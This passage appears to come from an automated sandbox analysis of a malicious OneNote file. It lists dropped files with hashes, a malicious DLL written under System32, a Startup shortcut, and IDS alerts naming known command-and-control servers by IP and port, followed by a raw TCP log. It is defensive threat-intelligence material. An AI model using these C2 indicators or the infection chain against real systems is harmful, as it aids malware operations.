SHA-512:	FF66F1C646E62DC2BE58856B0DE522C021323DFCB04418746E81804B19812E140C9DD835F8ECA3D5E2D9E2C2CCEBDDFD9B0974C005D6CF1E0E36FE96B7E21397
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{.....(..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVf.....................V.......6.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVf......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVf......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qVk...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 15:12:00 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
Category:	dropped
Size (bytes):	1251
Entropy (8bit):	4.662981510105176
Encrypted:	false
SSDEEP:	24:8X8Ko22hdOE+KZZMhCh7+FAyNqzWFUTdCDhxYUUBtIw7aB6m:8X8K2hdO7Mbh7+uGqzWFwdCDtUtmB6
MD5:	1F74F8F47C211ABA2EFE8E4C53BA3949
SHA1:	03594E08E7D0967E978D7E082F684CC19A8DF3FC
SHA-256:	7AB71365FC8AC68BDAB8285EF3350A328ADCD69276042BDF34B9640D8B0EE562
SHA-512:	E63D5FE59EF1F4F385E9802DA75DFDA8ED47D134AA751A952D1746C314C64352831F1FD04798C55FB8EA5DE9528668073282E62EDD1114FD3CA30FD96B11CACA
Malicious:	false
Preview:	L..................F.... ....>-......8.4.X...>-......h...........................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVf.....................V.......6.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVf......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVf......].....................u..O.f.f.i.c.e.1.6.....f.2..h...F(. .ONENOTEM.EXE..J.......F(.qV................................O.N.E.N.O.T.E.M...E.X.E.......l...............-.......k...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.U.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........*................@Z\|...K.J.........`.......X.......506013...........!a..%.H.VZAj...?.........

C:\Users\user\Desktop\Insight_Medical_Publishing_4.one

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	121940
Entropy (8bit):	6.705433225352871
Encrypted:	false
SSDEEP:	1536:DDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXh:PBoC+tCYvSMVnte8ZP1Y6JR
MD5:	1121A20F6B6969AABE8A210DD0891592
SHA1:	3F084084689DB6557E2EFE68A6FC42FF750F03C5
SHA-256:	A2D17BABFABBA4DAB963BAFA341AEE89D33857B44686DB4D73F45388BB2B7452
SHA-512:	4A44A6A1DF48B5C9C17A76A434164F18D245F4046F64ABD99F6DC1886EB03285C7DFC32E7E19E78919432C8E21980CF0E6DAF5D28C09D31411BD9EEBFBAC1CA0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Source: C:\Users\user\Desktop\Insight_Medical_Publishing_4.one, Author: Joe Security
Preview:	.R\{..M..Sx.).......i.E.....&.................?.....I..................................................................._fh.*..E.......n..w.....................h...........................T................G...4C..7..;............TL.E..!..................................<.7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6184
Entropy (8bit):	1.2192067091209342
Encrypted:	false
SSDEEP:	12:Ra6dOVYyfi/U/qcPRboOEN+Wn+J/NDlqtHCnXIxAS0H1DUONcVmt6HaDEjIB:YqOVYyf1ScVoOjf3AHCnCAS0V49VicU/
MD5:	6B29D2C3A044D68935C45875308EC263
SHA1:	425D668018A7C07EF77E63AE93633B3BBE953C14
SHA-256:	C5106D6634E4BD8FF44409386FCD5FB003B27B5B7C665D987EE3164BFEA9799F
SHA-512:	EEB429FA3AB4E2565F8F8C015D5B30981444ABEAD962495156A1D9B8D26FF4D23498FE3DE34D1AFD757122C5FB1D1F12A63D42A3FEAF2AA1583C5CF171F38D09
Malicious:	false
Preview:	./.C..vL....W"v_J....X.N...'.m.;................?.....I...............................................................................................................h...........................(................L.$Mp$H...N...X..........A....A..b..................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	360064
Entropy (8bit):	7.518024376236468
Encrypted:	false
SSDEEP:	6144:BvuTz5d1QI6vUih4AIqECkmwxuNBVMe56UveOAjNPyFj8XTcrOQM+:wz5d1AvUiWqrkmwWMe5cOuqF2TcOQM+
MD5:	449B32A246DDFDA80A5443A4E70ACE3B
SHA1:	CB567D17CE4AAC1D662D230EB026AC5064BBE6D1
SHA-256:	012226EB591FDBBF3030C0CF1FAA0F402169F90D79B1A62AC27D840A8464F11D
SHA-512:	E9B5BB79FFFF12D4150B5524EEBBE2D22F1B67DB6BE72CFB64DD7E7FE45E3ABEFAD06F0F09D0A14D87172B67AF052B8C9E6404E3D921658714C9914F59D6D6F4
Malicious:	false
Preview:	.R\{..M..Sx.)...3z(F.]k.p...................?.....I...................................a...............................J....X.N...'.m.;0....z..................h............................~......8............E...u.{.i..............L......uk.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\BqnZyHskpeTuo\PjkJxfQvhUP.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	6.730643971908688
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	Insight_Medical_Publishing_4.one
File size:	120428
MD5:	0c521381f0d5fe36e9dbf63e9012067d
SHA1:	29d169b2eca785dc579651b7e1ed2cb9ad854f37
SHA256:	332107452ecfb3cab8af719978c4c2acc8325219b57eceb77fc2ea77529ff92d
SHA512:	cf0b022919e0df0e320e2c08e1da2662e1000f78cf1febeae00af28790aa1988205e6c586ba4fd504b3368bf206bbba7753f8aae6194a55a0688b3e223b62997
SSDEEP:	1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXp:1BoC+tCYvSMVnte8ZP1Y6JZ
TLSH:	8FC33BF1A8025C0AE123C976B1FB661399D052ED42283B2BF87D507DD978A20D5DD8EF
File Content Preview:	.R\{...M..Sx.).......i.E......&.................?......I...................................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.7104.168.155.1434971580802404302 03/17/23-09:13:09.645395	TCP	2404302	ET CNC Feodo Tracker Reported CnC Server TCP group 2	49715	8080	192.168.2.7	104.168.155.143
192.168.2.766.228.32.314970770802404330 03/17/23-09:12:39.846393	TCP	2404330	ET CNC Feodo Tracker Reported CnC Server TCP group 16	49707	7080	192.168.2.7	66.228.32.31
192.168.2.791.121.146.474970580802404344 03/17/23-09:12:33.263560	TCP	2404344	ET CNC Feodo Tracker Reported CnC Server TCP group 23	49705	8080	192.168.2.7	91.121.146.47
192.168.2.7167.172.199.1654971080802404308 03/17/23-09:12:57.142531	TCP	2404308	ET CNC Feodo Tracker Reported CnC Server TCP group 5	49710	8080	192.168.2.7	167.172.199.165
192.168.2.7182.162.143.56497084432404312 03/17/23-09:12:45.141736	TCP	2404312	ET CNC Feodo Tracker Reported CnC Server TCP group 7	49708	443	192.168.2.7	182.162.143.56

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:11:49.553107977 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:49.553170919 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:49.553322077 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:49.561207056 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:49.561239958 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.134738922 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.134954929 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.139224052 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.139254093 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.139848948 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.194025993 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.430511951 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.430569887 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718293905 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718365908 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718377113 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718406916 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718445063 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.718481064 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.718513012 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.772311926 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993554115 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993578911 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993630886 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993674040 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993702888 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993724108 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993738890 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993755102 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993757010 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993772030 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993782997 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993807077 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993854046 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:50.993916035 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:50.993932009 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.037832975 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269156933 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269191027 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269273043 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269324064 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269397020 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269442081 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269495964 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269553900 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269555092 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269582033 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269591093 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269643068 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269678116 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269685984 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269722939 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269805908 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269825935 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269871950 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.269946098 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.269967079 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.313996077 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.314233065 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.314266920 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.366060019 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.544941902 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.544970036 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545031071 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545084000 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545100927 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545166969 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545219898 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545252085 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545264959 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545325041 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545336962 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545344114 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545372963 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545387030 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545420885 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545430899 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545459986 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545530081 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545542955 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545667887 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545737982 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545752048 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545762062 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545789957 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.545842886 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.545948029 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546036959 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546049118 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546072006 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546135902 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546243906 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546325922 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546343088 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546360016 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546421051 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546437025 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546489954 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546500921 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546535015 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.546595097 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.546608925 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.589847088 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.590018988 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.590059042 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.635950089 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.820267916 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.820307970 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.820427895 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.820465088 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.820905924 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.820919037 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.820981026 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821008921 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821089029 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821144104 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821224928 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821238041 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821295977 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821320057 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821335077 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821387053 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821363926 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821458101 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821527958 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821594000 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821599960 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821619034 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821655035 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821762085 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821850061 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821855068 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.821872950 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.821924925 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822000980 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822079897 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822096109 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822232008 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822305918 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822321892 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822364092 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822432995 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822446108 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822515011 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822582960 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822601080 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822731018 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822756052 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822777033 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822813988 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822829008 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822917938 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.822935104 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.822976112 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823034048 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823035002 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.823050022 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823108912 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.823127031 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823175907 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.823194027 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823262930 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.823276043 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823303938 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.823354959 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.823529005 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.827702045 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.827755928 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:11:51.827779055 CET	49702	443	192.168.2.7	203.26.41.131
Mar 17, 2023 09:11:51.827790022 CET	443	49702	203.26.41.131	192.168.2.7
Mar 17, 2023 09:12:33.263560057 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:33.291002989 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:33.291117907 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:33.296915054 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:33.324352026 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:33.344831944 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:33.344861031 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:33.345345974 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:33.349510908 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:33.378036976 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:33.478940010 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:35.500545979 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:35.500605106 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:35.527916908 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:36.035705090 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:36.088538885 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:39.039057016 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:39.039097071 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:39.039222956 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:39.039462090 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:39.039518118 CET	49705	8080	192.168.2.7	91.121.146.47
Mar 17, 2023 09:12:39.066812038 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:39.066845894 CET	8080	49705	91.121.146.47	192.168.2.7
Mar 17, 2023 09:12:39.846393108 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:39.946470976 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:39.946790934 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:39.947452068 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:40.047447920 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:40.056761026 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:40.056807995 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:40.056914091 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:40.112883091 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:40.213705063 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:40.218182087 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:40.359920025 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:41.178844929 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:41.229640961 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:44.179954052 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:44.179991007 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:44.180186987 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:44.180263042 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:44.180311918 CET	49707	7080	192.168.2.7	66.228.32.31
Mar 17, 2023 09:12:44.280158043 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:44.280205011 CET	7080	49707	66.228.32.31	192.168.2.7
Mar 17, 2023 09:12:45.141736031 CET	49708	443	192.168.2.7	182.162.143.56
